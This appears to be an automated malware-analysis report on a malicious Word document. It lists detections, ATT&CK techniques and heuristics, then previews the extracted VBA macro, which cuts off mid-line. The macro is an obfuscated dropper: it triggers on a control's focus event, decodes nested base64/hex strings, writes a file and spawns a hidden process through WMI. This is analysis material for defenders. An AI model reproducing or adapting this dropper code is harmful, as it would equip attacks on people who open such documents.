MALICIOUS
230
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The macros utilize CreateObject and GetObject functions, indicative of attempts to execute code. The presence of the 'AutoOpen' macro and the ClamAV detection 'Doc.Dropper.Agent-6842387-0' strongly suggest this document is a dropper designed to download and execute a secondary payload.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6842387-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6842387-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5196 bytes |
SHA-256: e6ce7407a6ce9150d37d4d87b647afa2b3ae4ae6e0f34901432c7aa4d1a9dc91 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "InkEdit1, 1, 0, INKEDLib, InkEdit"
Attribute VB_Control = "Nbszek, 0, 1, MSForms, Label"
Const ycjthyqvtu = 2
Const trpyttcmtf = 1
Const dgovyatzbi = 0
Function wazwyomiuchznhnwqk(ByVal xksoz)
Const ksnzjuJ = "ABCDEFGHI" & "JKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim flkeuaizpX8, sOut, groupBegin
xksoz = Replace(xksoz, vbCrLf, "")
xksoz = Replace(xksoz, vbTab, "")
xksoz = Replace(xksoz, " ", "")
flkeuaizpX8 = Len(xksoz)
For groupBegin = 1 To flkeuaizpX8 Step 4
Dim oieuslDm5, cdsnuzkqw, fleokquza24, thisData, nGroup, pOut
oieuslDm5 = 3
nGroup = 0
For cdsnuzkqw = 0 To 3
fleokquza24 = Mid(xksoz, groupBegin + cdsnuzkqw, trpyttcmtf)
If fleokquza24 = ftyftpxlnnbi("3d") Then
oieuslDm5 = oieuslDm5 - 1
thisData = 0
Else
thisData = InStr(trpyttcmtf, ksnzjuJ, fleokquza24, vbBinaryCompare) - 1
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), ftyftpxlnnbi("30")) & nGroup
pOut = Chr(CByte(ftyftpxlnnbi("2648") & Mid(nGroup, trpyttcmtf, ycjthyqvtu))) + _
Chr(CByte(ftyftpxlnnbi("2648") & Mid(nGroup, 3, ycjthyqvtu))) + _
Chr(CByte(ftyftpxlnnbi("2648") & Mid(nGroup, 5, ycjthyqvtu)))
sOut = sOut & Left(pOut, oieuslDm5)
Next
wazwyomiuchznhnwqk = sOut
End Function
Sub InkEdit1_GotFocus()
aYceLzaRWBzdRqDWb = "aOGkwNbYBd"
YTKJWDTRZtkXa = Array(20, 15, 20, 35, 31, 58)
GAvuEHVfQysLEj = 21584788
Call yfdovpkppbkx
Call fzepfezpofekpoz
AeqRGHLlmVhwHBoKd = "fleOdkzISsjz"
ctXVLbUCmpVfT = "CauOMqWkqh"
OPPrxGHgqouNQe = 1914037291
VhdjxdXMbJYoLx = 2068248205
End Sub
Sub yfdovpkppbkx()
Const NOWi = 0
vqccswqowqabbuvq = ftyftpxlnnbi("2e")
Set biqbgkumtrrvn = GetObject(wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("5a44") & ftyftpxlnnbi("4a7364574a585a48526b5345303257455a3350513d3d"))) & vqccswqowqabbuvq & wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("5745684b646d497a556d") & ftyftpxlnnbi("4e5a4d6d78305a47704a50513d3d"))))
apzosi4 = ftyftpxlnnbi("667a6b4a53667a6b4a6372667a6b4a69707469667a6b4a6e67667a6b4a4e786a736b497a46667a6b4a69667a6b4a6c655379667a6b") & ftyftpxlnnbi("4a7374667a6b4a656d667a6b4a4f62667a6b4a6a65667a6b4a63667a6b4a74667a6b4a")
apzosi4 = Replace(apzosi4, "fzkJ", "")
whQCjggoliwSV = "IabvKkbGjPicZMYr"
YGqLtrvPMriXTUsG = 815423797
apzosi4 = Replace(apzosi4, ftyftpxlnnbi("4e78") & ftyftpxlnnbi("6a736b497a"), ftyftpxlnnbi("2e"))
ILeQuXWajoJEzSyd = 1683081379
ahbsmrdxeqqezbwxlkug = Environ(wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("5a456457") & ftyftpxlnnbi("64474e425054303d")))) & wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("5745645765574e744f586c6a6554") & ftyftpxlnnbi("56705756685250513d3d")))
lsokNuezi = apzosi4
geCrMKOADRPpQZ = "eZGrSeXDuHjVFvy"
kebxxrhrr = wazwyomiuchznhnwqk(dzksju & Nbszek & odkzadozj)
Set kbqehickihorkonwrx = CreateObject(lsokNuezi)
Dim uqmhjmqhiikshwdw As Object
Set uqmhjmqhiikshwdw = kbqehickihorkonwrx.CreateTextFile(ahbsmrdxeqqezbwxlkug)
OarmHjHpdHCvL = "sgmhzEeJkAZjWtG"
jqotZFrXtxieQimo = 1900470925
uqmhjmqhiikshwdw.WriteLine kebxxrhrr
uqmhjmqhiikshwdw.Close
Set ravtubttrfazxvdqv = biqbgkumtrrvn.Get(wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("56") & ftyftpxlnnbi("6a4a7364553136536d5a565345703257544a57656d4d78546a425a57456f775a46684250513d3d"))))
Set xwpvqlgjnxtessvnnig = ravtubttrfazxvdqv.SpawnInstance_
xwpvqlgjnxtessvnnig.ShowWindow = NOWi
oiKVesAQrMBKVTi = "JXiQbVRsuPZLU"
Set ayqubuuwvnjkdwizi = GetObject(wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("5a444a7364") & ftyftpxlnnbi("574a585a48526b5345303257455a3350513d3d"))) & vqccswqowqabbuvq & wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("574568") & ftyftpxlnnbi("4b646d497a556d4e5a4d6d78305a47704a4e6c59796248564e656b706d5655684b646c6b79566e706a647a3039"))))
dyknndtjyagyairypf = Environ(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.